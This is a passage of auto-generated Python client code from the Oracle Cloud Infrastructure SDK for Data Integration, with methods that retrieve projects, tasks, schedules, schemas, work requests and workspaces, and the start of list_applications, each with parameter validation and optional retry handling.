Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_pipeline_validation.py.html>`__ to see an example of how to use the get_pipeline_validation API.
"""
resource_path = "/workspaces/{workspaceId}/pipelineValidations/{pipelineValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_pipeline_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineValidationKey": pipeline_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PipelineValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="PipelineValidation")
def get_project(self, workspace_id, project_key, **kwargs):
"""
Retrieves a project using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str project_key: (required)
The project key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] projection: (optional)
This parameter allows users to specify which view of the object to return. CHILD_COUNT_STATISTICS - This option is used to get statistics on immediate children of the object by their type.
Allowed values are: "CHILD_COUNT_STATISTICS"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_project.py.html>`__ to see an example of how to use the get_project API.
"""
resource_path = "/workspaces/{workspaceId}/projects/{projectKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"projection"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"projectKey": project_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'projection' in kwargs:
projection_allowed_values = ["CHILD_COUNT_STATISTICS"]
for projection_item in kwargs['projection']:
if projection_item not in projection_allowed_values:
raise ValueError(
"Invalid value for `projection`, must be one of {0}".format(projection_allowed_values)
)
query_params = {
"projection": self.base_client.generate_collection_format_param(kwargs.get("projection", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Project")
def get_published_object(self, workspace_id, application_key, published_object_key, **kwargs):
"""
Retrieves the details of a published object from an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str published_object_key: (required)
The published object key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str expand_references: (optional)
Used to expand references of the object. If the value is true, then all referenced objects are expanded. If the value is false, then shallow objects are returned in place of references. Default is false. Example: `?expandReferences=true` returns all objects of type data loader task.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PublishedObject`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_published_object.py.html>`__ to see an example of how to use the get_published_object API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/publishedObjects/{publishedObjectKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"expand_references"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_published_object got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"publishedObjectKey": published_object_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"expandReferences": kwargs.get("expand_references", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PublishedObject")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PublishedObject")
def get_reference(self, workspace_id, application_key, reference_key, **kwargs):
"""
Retrieves a reference in an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str reference_key: (required)
The reference key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Reference`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_reference.py.html>`__ to see an example of how to use the get_reference API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/references/{referenceKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_reference got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"referenceKey": reference_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Reference")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Reference")
def get_schedule(self, workspace_id, application_key, schedule_key, **kwargs):
"""
Retrieves a schedule using the specified schedule key.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str schedule_key: (required)
The schedule key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Schedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_schedule.py.html>`__ to see an example of how to use the get_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules/{scheduleKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"scheduleKey": schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Schedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Schedule")
def get_schema(self, workspace_id, connection_key, schema_resource_name, **kwargs):
"""
Retrieves a schema that can be accessed using the specified connection.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
The schema resource name used for retrieving schemas.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Schema`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_schema.py.html>`__ to see an example of how to use the get_schema API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas/{schemaResourceName}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_schema got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key,
"schemaResourceName": schema_resource_name
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Schema")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Schema")
def get_task(self, workspace_id, task_key, **kwargs):
"""
Retrieves a task using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str expand_references: (optional)
Used to expand references of the object. If true, all referenced objects are expanded; if false, shallow objects are returned in place of references. Default is false. Example: `?expandReferences=true` returns all objects of type data loader task.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Task`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_task.py.html>`__ to see an example of how to use the get_task API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"expand_references"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_task got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"expandReferences": kwargs.get("expand_references", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Task")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Task")
def get_task_run(self, workspace_id, application_key, task_run_key, **kwargs):
"""
Retrieves a task run using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_run_key: (required)
The task run key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskRun`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_task_run.py.html>`__ to see an example of how to use the get_task_run API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns/{taskRunKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_task_run got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskRunKey": task_run_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskRun")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskRun")
def get_task_schedule(self, workspace_id, application_key, task_schedule_key, **kwargs):
"""
Retrieves a task schedule using the specified key.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_schedule_key: (required)
The task schedule key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskSchedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_task_schedule.py.html>`__ to see an example of how to use the get_task_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules/{taskScheduleKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_task_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskScheduleKey": task_schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskSchedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskSchedule")
def get_task_validation(self, workspace_id, task_validation_key, **kwargs):
"""
Retrieves a task validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_validation_key: (required)
The task validation key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_task_validation.py.html>`__ to see an example of how to use the get_task_validation API.
"""
resource_path = "/workspaces/{workspaceId}/taskValidations/{taskValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_task_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskValidationKey": task_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="TaskValidation")
def get_work_request(self, work_request_id, **kwargs):
"""
Retrieves the status of the work request with the given ID.
:param str work_request_id: (required)
The ID of the asynchronous work request to retrieve.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.WorkRequest`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_work_request.py.html>`__ to see an example of how to use the get_work_request API.
"""
resource_path = "/workRequests/{workRequestId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="WorkRequest")
def get_workspace(self, workspace_id, **kwargs):
"""
Retrieves a Data Integration workspace using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Workspace`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_workspace.py.html>`__ to see an example of how to use the get_workspace API.
"""
resource_path = "/workspaces/{workspaceId}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Workspace")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Workspace")
def list_applications(self, workspace_id, **kwargs):
"""
Retrieves a list of applications and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the published object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
